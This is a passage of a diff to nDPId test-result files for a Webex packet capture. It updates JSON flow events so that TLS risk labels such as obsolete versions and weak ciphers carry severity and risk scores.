-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"}
-00815{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00815{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}}
-00856{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01465{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"}
@@ -200,50 +200,50 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 